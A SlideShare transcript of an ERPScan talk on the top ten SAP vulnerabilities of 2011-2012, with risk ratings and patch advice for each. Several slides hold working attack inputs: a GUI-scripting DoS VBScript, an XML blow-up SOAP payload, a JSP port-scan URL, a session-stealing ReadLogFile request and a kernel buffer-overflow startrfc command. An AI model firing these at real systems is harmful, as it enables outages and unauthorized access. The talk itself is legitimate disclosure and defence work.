SlideShare a Scribd company logo

SAP (in)security: New and best

ERPScan
ERPScan

The presentation provides the list of top 10 SAP vulnerabilities (2011-2012) as well as ways of defense. 1. Authentication Bypass via Verb tampering 2. Authentication Bypass via the Invoker servlet 3. Buffer overflow in ABAP Kernel 4. Code execution via TH_GREP 5. MMC read SESSIONID 6. Remote portscan 7. Encryption in SAPGUI 8. BAPI XSS/SMBRELAY 9. XML Blowup DOS 10. GUI Scripting DOS

1 of 66
Download to read offline
Invest  in  security   to  secure  investments   SAP  (In)Security:  New  and   Best   Alexander  Polyakov.  CTO  at  ERPScan   1  
About  ERPScan   •  The   only   360-­‐degree   SAP   Security   soluHon   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta>ons  key  security  conferences  worldwide   •  25  Awards  and  nomina>ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
What  is  SAP  ?                      Shut  up              And              Pay   3  
Really   •  The  most  popular  business  applicaHon   •  More  than  120000  customers   •  74%  of  Forbes  500   4  
Agenda   •  Intro   •  SAP  security  history   •  SAP  on  the  Internet   •  Most  popular  SAP  issues  (OLD)   •  Top  10  latest  interesHng  a[acks  (NEW)   •  DEMOs   •  Conclusion     5  
6   3  areas  of  SAP  Security   2010   Applica3on  pla4orm  security   Prevents  unauthorized  access  both  insiders  and  remote   a3ackers   SoluHon:  Vulnerability  Assessment  and  Monitoring   2008   ABAP  Code  security   Prevents  a3acks  or  mistakes  made  by  developers   SoluHon:  Code  audit   2002   Business  logic  security  (SOD)   Prevents  a3acks    or  mistakes  made     SoluHon:  GRC  
0   5   10   15   20   25   30   35   2006   2007   2008   2009   2010   2011   2012   Most  popular:   •  BlackHat     •  HITB     •  Troopers     •  RSA     •  Source     •  DeepSec       •  etc.   Talks  about  SAP  security   7  
0   100   200   300   400   500   600   700   800   900   2001   2002   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   By  April  26,  2012,  a  total  of  2026  notes   SAP  Security  notes   8  
0   50   100   150   200   250   300   350   12  -­‐SQL  Inj   11  -­‐  BOF   10  -­‐  Denial  of  service     9  -­‐  Remote  Code  ExecuHon   8  -­‐  Verb  tampering   7  -­‐  Code  injecHon  vulnerability   6  -­‐  Hard-­‐coded  credenHals   5  -­‐  Unauthorized  usage  of  applicaHon   4  -­‐  InformaHon  Disclosure   3  -­‐  Missing  Auth  check   2  -­‐  XSS/Unauthorised  modificaHon  of   1  -­‐  Directory  Traversal       Stats  from  :   •  1Q  2012   •  1Q  2010   •  4Q  2009   SAP  vulnerabili>es  by  type   9  
Top  problems  by  OWASP-­‐EAS   (Implementa>on  issues)   •  EASAI-­‐1  Lack  of  patch  management   •  EASAI-­‐2  Default  Passwords  for  applicaHon  access   •  EASAI-­‐3  SOD  conflicts   •  EASAI-­‐4  Unnecessary  Enabled  ApplicaHon  features     •  EASAI-­‐5  Open  Remote  management  interfaces   •  EASAI-­‐6  lack  of  password  lockout/complexity  checks   •  EASAI-­‐7  Insecure  opHons     •  EASAI-­‐8  Unencrypted  communicaHons   •  EASAI-­‐9  Insecure  trust  relaHons   •  EASAI-­‐10  Guest  access   10  
Top  problems  by  BIZEC   •  BIZEC  TEC-­‐01:  Vulnerable  Sojware  in  Use   •  BIZEC  TEC-­‐02:  Standard  Users  with  Default  Passwords   •  BIZEC  TEC-­‐03:  Unsecured  SAP  Gateway   •  BIZEC  TEC-­‐04:  Unsecured  SAP/Oracle  authenHcaHon   •  BIZEC  TEC-­‐05:  Insecure  RFC  interfaces   •  BIZEC  TEC-­‐06:  Insufficient  Security  Audit  Logging   •  BIZEC  TEC-­‐07:  Unsecured  SAP  Message  Server   •  BIZEC  TEC-­‐08:  Dangerous  SAP  Web  ApplicaHons   •  BIZEC  TEC-­‐09:  Unprotected  Access  to  AdministraHon  Services   •  BIZEC  TEC-­‐10:  Insecure  Network  Environment   •  BIZEC  TEC-­‐11:  Unencrypted  CommunicaHons   11  
Business  Risks   Espionage   •  Stealing  financial  informaHon   •  Stealing  corporate  secrets   •  Stealing  suppliers  and  customers  list   •  Stealing  HR  data   Sabotage   •  Denial  of  service   •  ModificaHon  of  financial  reports   •  Access  to  technology  network  (SCADA)  by  trust  relaHons     Fraud   •  False  transacHons   •  ModificaHon  of  master  data   •  e.t.c.   12  
SAP  on  the  Internet   MYTH:  SAP  systems  a^acks    available  only  for  insiders   •  We  have  collected  data  about  SAP  systems  in  the  WEB   •  Have  various  stats  by  countries,  applicaHons,  versions   •  InformaHon  from  Google,  Shodan,  Nmap  scan   13  
SAP  on  the  Internet   14  
About  5000  systems  including  Dispatcher,  Message  server,    SapHostcontrol,  Web-­‐  services   SAP  on  the  Internet   15  
Top  10  vulnerabili>es  2011-­‐2012   1.  AuthenHcaHon  Bypass  via  Verb  tampering   2.  AuthenHcaHon  Bypass    via  the  Invoker  servlet     3.  Buffer  overflow  in  ABAP  Kernel   4.  Code  execuHon  via  TH_GREP   5.  MMC  read  SESSIONID   6.  Remote  portscan   7.  EncrypHon  in  SAPGUI     8.  BAPI  XSS/SMBRELAY       9.  XML  Blowup  DOS   10.  GUI  ScripHng  DOS   16  
10  –  GUI-­‐Scrip>ng  DOS:  Descrip>on       •  SAP  users  can  run  scripts  which  automate  their  user  funcHons   •  A  script  has  the  same  rights  in  SAP  as  the  user  who  launched  it   •  Security  message  which  is  shown  to  user  can  be  turned  off  in   the  registry   •  Almost  any  user  can  use  SAP  Messages  (SM02  transacHon)   •  It  is  possible  to  run  DOS  a[ack  on  any  user  using  a  simple  script           New   Author: Dmitry Chastukhin (ERPScan) 17  
10  –  GUI-­‐scrip>ng:  Details     If Not IsObject(application) Then Set SapGuiAuto = GetObject("SAPGUI") Set application = SapGuiAuto.GetScriptingEngine End If If Not IsObject(connection) Then Set connection = application.Children(0) End If If Not IsObject(session) Then Set session = connection.Children(0) End If If IsObject(WScript) Then WScript.ConnectObject session, "on" WScript.ConnectObject application, "on" End If do a=a+1 session.findById("wnd[0]").maximize session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02" session.findById("wnd[0]/tbar[0]/btn[0]").press session.findById("wnd[0]/tbar[1]/btn[34]").press session.findById("wnd[1]/usr/txtEMLINE1").text = "hello" session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0 session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0 session.findById("wnd[1]").sendVKey 4 session.findById("wnd[2]/usr/lbl[1,3]").setFocus session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15 session.findById("wnd[2]").sendVKey 2 session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800" session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en" session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2 session.findById("wnd[1]/tbar[0]/btn[0]").press Loop Until a>=1000 18  
10  –  GUI-­‐scrip>ng:  Other  a^acks       Other  a^acks  like  changing  banking  accounts  in  LFBK  also  possible     Script  can  be  uploaded  using:   •  SAPGUI  AcHveX  vulnerability     •  Teensy  USB  flash     •  Any  other  method  of  client  exploitaHon     19  
10  –  GUI-­‐scrip>ng:    Business  risks   Ease  of  exploita>on  –  Medium   Sabotage  –  High   Espionage  –  No   Fraud  –  No   20  
 10  –  GUI-­‐scrip>ng:    Preven>on     •       SAP  GUI  ScripHng  Security  Guide   •       sapgui/user_scripHng  =  FALSE   •       Block  registry  modificaHon  on  workstaHons     21  
9  –  XML  Blowup  DOS:  Descrip>on       •  WEBRFC  interface  can  be  used  to  run  RFC  funcHons   •  By  default  any  user  can  have  access   •  Can  execute  at  least  RFC_PING   •  SAP  NetWeaver  is  vulnerable  to  malformed  XML  packets   •  It  is  possible  to  run  DOS  a[ack  on  server  using  simple  script     •  It  is  possible  to  run  over  the  Internet!           New   Author: Alexey Tyurin (ERPScan) 22  
9  –  XML  Blowup  DOS:  Details     <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Body><m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions" a1="" a2="" ... a10000="" > </m:RFC_PING> </SOAP-ENV:Body> </SOAP-ENV:Envelope> 23  
9  –  XML  Blowup  DOS:  Business  risks   Ease  of  exploita>on  –  Medium   Espionage  –  No   Fraud  –  No   Sabotage  –  Cri>cal   24  
 9  –  XML  Blowup  DOS:    Preven>on   •       Disable  WEBRFC           •       Prevent  unauthorized  access  to  WEBRFC  using  S_ICF   •       Install  SAP  notes  1543318  and  1469549     25  
Author: Dmitry Chastukhin (ERPScan) 8  –  BAPI  script  injec>on/hash  stealing  :   Descrip>on     •  SAP  BAPI  transacHon  fails  to  properly  saniHze  input   •  Possible  to  inject  JavaScript  code  or  link  to  a  fake  SMB  server   •  SAP   GUI   clients   use   Windows   so   their   credenHals   will   be   transferred  to  a[ackers  host.           26  
New   8  –  BAPI  script  injec>on/hash  stealing:   Demo   27  
Ease  of  exploita>on  –  Low   Sabotage    –  High   Espionage    –  High   Fraud    –  High   8  –  BAPI  script  injec>on/hash  stealing:   Business  risks   28  
7  –  SAP  GUI  bad  encryp>on:  Descrip>on   •  SAP  •  SAP  FrontEnd  can  save  encrypted  passwords  in  shortcuts     •  Shortcuts  stored  in  .sap  file   •  This  password  uses  byte-­‐XOR  algorithm  with  “secret”  key   •  Key  has  the  same  value  for  every  installaHon  of  SAP  GUI   •  Any  password  can  be  decrypted  in  1  second         Author:Author: Alexey Sintsov (ERPScan New  
7  –  SAP  GUI  bad  encryp>on:  Demo     30  
7  –  SAP  GUI  bad  encryp>on:  Business  risks   Sabotage  –  Medium   Fraud  –  High   Espionage  –  High   Ease  of  exploita>on  –  Medium   31  
7  –  SAP  GUI  bad  encryp>on:  Preven>on     •       Disable  password  storage  in  GUI     32  
6  –  Remote  port  scan  via  JSP:  Descrip>on     •   It  is  possible  to  scan  internal  network  from  the  Internet   •   Authen>ca>on  is  not  required   •   SAP  NetWeaver  J2EE  engine  is  vulnerable     •  /ipcpricing/ui/BufferOverview.jsp?   •  server=172.16.0.13     •  &  port=31337     •  &  password=     •  &  dispatcher=     •  &  targetClient=     •  &  view=   Author: Alexander Polyakov (ERPScan) 33  
6  –  Remote  port  scan  via  JSP:  Demo   Port  closed   HTTP  port   SAP  port   34  
6  –  Remote  port  scan  via  JSP:  Business  risks   Ease  of  exploita>on  –  High   Espionage  –  Medium   Fraud  –  No   Sabotage  –  Low   35  
6  –  Remote  port  scan  via  JSP:  Preven>on     •       Install  SAP  notes:    1548548,  1545883,  1503856,  948851,  1545883   •       Disable  unnecessary  applicaHons     36  
5  –  MMC  JSESSIONID  stealing:  Descrip>on     •  Remote  management  of  SAP  Plaworm   •  By  default,  many  commands  go  without  auth   •  Exploits  implemented  in  Metasploit  (by  ChrisJohnRiley)   •  Most  of  the  bugs  are  informaHon  disclosure   •  It  is  possible  to  find  informaHon  about  JSESSIONID   •  Only  if  trace  is  ON   Can  be  authen>cated  as  an  exis>ng  user  remotely   1)  Original bug by ChrisJohnRiley 2)  JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan) New   37  
5  –  MMC  SESSIONID  stealing:  Details     <?xml version="1.0" encoding="UTF-8" ?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http:// www.w3.org/2001/XMLSchema"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess = "http:// www.sap.com/webas/630/soap/features/session/"> <enableSession>true</ enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl"> <filename>j2ee/cluster/server0/log/system/ userinterface.log</filename> <filter></filter> <language></language> <maxentries>100</maxentries> <statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-ENV:Body> </SOAP-ENV:Envelope> 38  
5  –  MMC  JSESSIONID  stealing:  Business  risks   Espionage  –  Cri>cal   Sabotage  –  Medium   Fraud  –  High   Ease  of  exploita>on  –  Medium   39  
5  –  MMC  JSESSIONID  stealing:  Preven>on     •  The  JSESSIONID  by  default  will  not  be  logged  in  log  file     •  Don’t  use  TRACE_LEVEL  =  3  on  producHon  systems  or  delete   traces  ajer  use   •  Other  info  h[p://help.sap.com/saphelp_nwpi71/helpdata/ en/d6/49543b1e49bc1fe10000000a114084/frameset.htm       40  
•  RCE  vulnerability  in  RFC  module  TH_GREP   •  Found  by  Joris  van  de  Vis   •  SAP  was  not  properly  patched  (1433101)   •  We  have  discovered  that  the  patch  can  be  bypassed  in   Windows     Origina  l  bug  by  Joris  van  de  Vis  (erp-­‐sec)   Bypass  by  Alexey  Tyurin  (ERPScan)   4    –  Remote  command  execu>on  in   TH_GREP:  Descrip>on   41  
4  –  RCE  in  TH_GREP:  Details       elseif opsys = 'Windows NT'. concatenate '/c:"' string '"' filename into grep_params in character mode. else. /*if linux*/ /* 185 */ replace all occurrences of '''' in local_string with '''"''"'''. /* 186 */ concatenate '''' local_string '''' filename into grep_params /* 187*/ in character mode. /* 188*/ endif. /* 188*/ 42  
4  –  RCE  in  TH_GREP:  Demo  #1   43  
4  -­‐  RCE  in  TH_GREP:  More  details     4  ways  to  execute  vulnerable  program     •  Using  transacHon  "Se37“   •  Using  transacHon  “SM51“  (thanks  to  Felix  Granados)   •  Using  remote  RFC  call  "TH_GREP"   •  Using  SOAP  RFC  call  "TH_GREP"    via  web     44  
4  –  RCE  in  TH_GREP:  Demo  #2   45  
4  –  RCE  in  TH_GREP:  Business  risks   Sabotage  –  Medium   Fraud  –  High   Espionage  –  High   Ease  of  exploita>on  –  medium   46  
4  –  RFC  in  TH_GREP:  Preven>on   •       Install  SAP  notes  1580017,  1433101   •       Prevent  access  to  criHcal  transacHons  and  RFC  funcHons   •       Check  the  ABAP  code  of  your  Z-­‐transacHons  for  similar   vulnerabiliHes   47  
3  -­‐  ABAP  Kernel  BOF:  Descrip>on   •  Presented  by    Andreas  Wiegenstein  at  BlackHat  EU  2011   •  Buffer  overflow  in  SAP  kernel  funcHon  C_SAPGPARAM   •   When  NAME  field  is  more  than  108  chars   •  Can  be  exploited  by  calling  an  FM  which  uses  C_SAPGPARAM   •  Example  of    report  –  RSPO_R_SAPGPARAM   Author: (VirtualForge) 48  
3  -­‐ABAP  Kernel  BOF:  Details   > startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 –u SAP* -p 11111 -F RSPO_R_SAPGPARAM -E NAME=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAA -t 4 RFC Call/Exception: SYSTEM_FAILURE Group Error group 104 Key RFC_ERROR_SYSTEM_FAILURE Message connection closed without message (CM_NO_DATA_RECEIVED) 49  
3  –  ABAP  Kernel  BOF:    Business  risks   Ease  of  exploita>on  –  Medium   Espionage    –  Cri>cal   Fraud    –  Cri>cal   Sabotage    –  Cri>cal   50  
3  –  ABAP  Kernel  BOF:  Preven>on   •   Install  SAP  notes:   -  1493516  –  CorrecHng  buffer  overflow  in  ABAP  system  call   -  1487330  –  PotenHal  remote  code  execuHon  in  SAP  Kernel   •       Prevent  access  to  criHcal  transacHons  and  RFC  funcHons   •       Check  the  ABAP  code  of  your  Z-­‐transacHons  for  criHcal  calls   51  
2  –  Invoker  Servlet:  Descrip>on   •  Rapidly  calls  servlets  by  their  class  name   •  Published  by  SAP  in  their  security  guides   •  Possible  to  call  any  servlet  from  the  applicaHon   •  Even  if  it  is  not  declared  in    WEB.XML   Can  be  used  for  auth  bypass   52  
2  -­‐  Invoker  Servlet:  Details   <servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet- class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> Author: Dmitry Chastukhin (ERPScan) What  if  we  call  /servlet/com.sap.admin.Cri>cal.Ac>on     53  
2  –  Invoker  servlet:  Business  risks   Ease  of  use  –  Very  easy!   Espionage    –  High   Sabotage    –  High   Fraud    –  High   54  
2  -­‐  Invoker  servlet:  Preven>on   •  Update  to  the  latest  patch  1467771,  1445998   •  “EnableInvokerServletGlobally”   property   of   the   servlet_jsp  must  be  “false”       If  you  can’t  install  patches  for  some  reason,  you  can  check   all  WEB.XML  files  using  ERPScan  web.xml  scanner  manually.   55  
 1  –  VERB  Tampering   56  
1st    Place  –  Verb  Tampering   <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource- name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> What  if  we  use  HEAD  instead  of  GET  ?   Author: Alexander Polyakov (ERPScan) 57  
1st  Place  –  Verb  tampering:  Details   Remotely  without  authen>ca>on!   •  CTC  –  Secret  interface  for  managing  J2EE  engine   •  Can  be  accessed  remotely     •  Can  run  user  management  acHons:     –  Add  users   –  Add  to  groups   –  Run  OS  commands   –  Start/Stop  J2EE   58  
1  –  Verb  tampering:  Demo   59  
1  –  Verb  tampering:  More  details   If  patched,  can  be  bypassed  by  the  Invoker  servlet!   60  
1  –  Verb  tampering:  Business  risks   Espionage    –  Cri>cal   Sabotage  –  Cri>cal     Fraud    –  Cri>cal   Ease  of  use  –  Very  easy!   61  
PrevenHon:   •  Install  SAP  notes  1503579,1616259   •  Install  other  SAP  notes  about  Verb  Tampering  (about  18)   •  Scan  applicaHons  using  ERPScan  WEB.XML  check  tool  or   manually   •  Secure  WEB.XML  by  deleHng  all    <h[p-­‐method>   •  Disable  the  applicaHons  that  are  not  necessary   1st  Place  –  Verb  tampering:  Preven>on   62  
Conclusion   It  is  possible  to  be  protected  from  almost  all  those  kinds  of  issues   and  we  are  working  hard  with  SAP  to  make  it  secure     SAP  Guides   It’s  all  in  your  hands   Regular  Security  assessments   ABAP  Code  review   Monitoring  technical  security   Segrega>on  of  Du>es   63  
Future  work   Many  of  the  researched  things  cannot  be  disclosed  now  because   of  our  good  relaHonship  with  SAP  Security  Response  Team,  whom  I   would  like  to  thank  for  cooperaHon.  However,  if  you  want  to  see   new  demos  and  0-­‐days,  follow  us  at  @erpscan  and  a[end  the   future  presentaHons:   •  Just4MeeHng    in  July  (Portugal)   •  BlackHat  USA    in  July    (Las  Vegas)   64  
Greetz   to   our   crew   who   helped:   Dmitriy   Evdokimov,   Alexey   Sintsov,   Alexey   Tyurin,   Pavel   Kuzmin,  Evgeniy  Neelov.     65  
    Web:    www.erpscan.com   e-­‐mail:    info@erpscan.com                                  sales@erpscan.com   Twi3er:    @erpscan                  @sh2kerr   66  

Recommended

SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessERPScan
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP securityERPScan
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeERPScan
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)ERPScan
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applicationsERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM HackingERPScan
 

Recommended

SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessERPScan
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP securityERPScan
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeERPScan
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPERPScan
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionERPScan
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)ERPScan
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applicationsERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM HackingERPScan
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsERPScan
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit ERPScan
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineERPScan
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP MobileERPScan
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 stepsERPScan
 
Sap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatSap security – thinking with a hacker’s hat
Sap security – thinking with a hacker’s hatn|u - The Open Security Community
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 stepsERPScan
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsERPScan
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to usERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easyERPScan
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figuresERPScan
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...ERPScan
 
Sap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthSap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthIgor Igoroshka
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsOnapsis Inc.
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP SystemsOnapsis Inc.
 
SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015
SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015
SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015Ertunga Arsal
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsERPScan
 
SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and BestPositive Hack Days
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating ERPScan
 

More Related Content

What's hot

Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)ERPScan
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsERPScan
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit ERPScan
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineERPScan
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP MobileERPScan
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 stepsERPScan
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 stepsERPScan
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsERPScan
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to usERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easyERPScan
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figuresERPScan
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...ERPScan
 
Sap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthSap penetration testing_defense_in_depth
Sap penetration testing_defense_in_depthIgor Igoroshka
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsOnapsis Inc.
 
Penetration Testing SAP Systems
Penetration Testing SAP SystemsPenetration Testing SAP Systems
Penetration Testing SAP SystemsOnapsis Inc.
 
SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015
SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015
SAP Security - Real life Attacks to Business Processes - Hack in Paris 2015Ertunga Arsal
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsERPScan
 

What's hot (20)

Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
